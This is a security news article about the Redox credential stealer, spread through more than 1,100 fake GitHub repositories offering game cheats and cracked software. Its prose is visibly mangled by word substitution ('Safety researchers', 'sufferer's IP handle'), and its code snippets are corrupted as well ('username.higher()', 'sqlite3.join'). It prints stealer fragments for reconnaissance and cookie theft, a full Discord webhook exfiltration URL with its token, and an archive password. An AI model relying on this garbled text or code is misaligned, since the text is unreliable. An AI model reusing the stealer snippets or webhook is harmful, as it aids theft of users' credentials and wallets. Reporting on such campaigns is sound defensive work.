A classy malware marketing campaign leveraging GitHub repositories disguised as recreation modifications and cracked software program has been uncovered, exposing a harmful convergence of social engineering ways and automatic credential harvesting.
Safety researchers recognized over 1,100 malicious repositories distributing variants of the Redox stealer, a Python-based malware designed to exfiltrate delicate knowledge together with cryptocurrency pockets keys, browser cookies, and gaming platform credentials.
Technical Structure of the Redox Stealer
The malware operates by means of a multi-stage knowledge harvesting course of starting with system reconnaissance.
Preliminary execution triggers a globalInfo() operate that collects the sufferer’s IP handle, geolocation by way of the geolocation-db.com API, and Home windows username utilizing os.getenv(‘USERNAME’).
This knowledge is formatted into Discord-enabled Markdown for exfiltration:
def globalInfo():
ip = getip() # Customized IP resolver omitted in decompiled code
username = os.getenv('USERNAME')
ipdata = requests.get(f"https://geolocation-db.com/jsonp/{ip}").json()
return f":flag_{ipdata['country_code']}: - `{username.higher()} | {ip} ({ipdata['country_name']})`"Obfuscation methods embrace base64-encoded Discord webhook URLs break up throughout a number of variables (magic, love, god, future) to evade static evaluation.
When reconstructed, these strings resolve to energetic webhooks like https://discord.com/api/webhooks/1050437982584324138/VJByvmBKESSUv4fYn0LIjlBR4VzMRTEPOKVJoWFvCeHd7o3LtclQMJDMuiLzT57iqn7B, which function centralized logging endpoints for attackers.
Repository Social Engineering Ways
Attackers make use of algorithmic repository era methods outlined in a now-deleted “social engineering” discussion board information. Key ways embrace:
- Matter Poisoning: Repositories are tagged with search-optimized phrases like free Roblox aimbot obtain or FL Studio crack for PC, exploiting GitHub’s matter system to floor in Google searches. A script detected 38,000 potential malicious subjects derived from base key phrases (valorant, photoshop) mixed with modifiers (cracked, hack)1.
- Readme Fabrication: ChatGPT-generated descriptions accompanied by cast VirusTotal “0/70 malware” screenshots construct credibility. One repository for a faux Valorant aimbot ranked #9 on Google search outcomes regardless of containing a problem labeled “DANGER: MALWARE”.
- Binary Obfuscation: Malicious payloads are distributed as password-protected RAR archives or hosted on Anonfiles to bypass GitHub’s automated malware scanning.
Automated Information Harvesting Workflow
The Redox payload incorporates SQLite database queries to extract credentials from browsers (Chrome, Edge) and functions like Steam and Discord:
def getCookie(path, arg):
conn = sqlite3.join(tempfold)
cursor = conn.cursor()
cursor.execute('SELECT host_key, title, encrypted_value FROM cookies')
knowledge = cursor.fetchall() # Decryption by way of DPAPI omitted
return base64.b64encode(pickle.dumps(knowledge))Information matching key phrases (metamask, exodus, riotgames) are zipped and uploaded to Anonfiles utilizing multithreaded employees.
The Kiwi() module recursively scans directories for paperwork containing phrases like “password” or “financial institution,” prioritizing Desktop, Downloads, and Paperwork folders.
A customized Python crawler recognized 1,115 suspicious repositories, 351 of which matched the “README + archive” construction indicative of malware.
Regardless of 10% of repos having user-reported points, solely 3% (11 repos) had been flagged as malicious—a 97% success fee in evading detection.
GitHub’s Response and Mitigation Challenges
Regardless of GitHub’s malware detection techniques, repositories stay energetic because of:
- Delayed Takedowns: Attackers regenerate banned repositories utilizing automated matter permutations.
- Reliable-Wanting Exercise: Accounts with practical commit histories and star counts bypass heuristic evaluation.
- Encrypted Payloads: RAR passwords (“cheats4u”) stop static code evaluation.
The researcher’s spreadsheet of confirmed malicious repos has not but triggered bulk takedowns, highlighting gaps in proactive monitoring.
As one discussion board person lamented, “Script kiddies flooded GitHub with faux cracks—now even actual ones get flagged”, underscoring the collateral harm of those campaigns. GitHub has but to touch upon deliberate detection enhancements.
This marketing campaign illuminates the evolving misuse of open-source platforms for large-scale social engineering.
With Redox’s codebase requiring only one,000 strains of Python to automate credential harvesting, builders should stay vigilant towards too-good-to-be-true repositories—even on trusted platforms like GitHub.
Gather Risk Intelligence on the Newest Malware and Phishing Assaults with ANY.RUN TI Lookup -> Attempt at no cost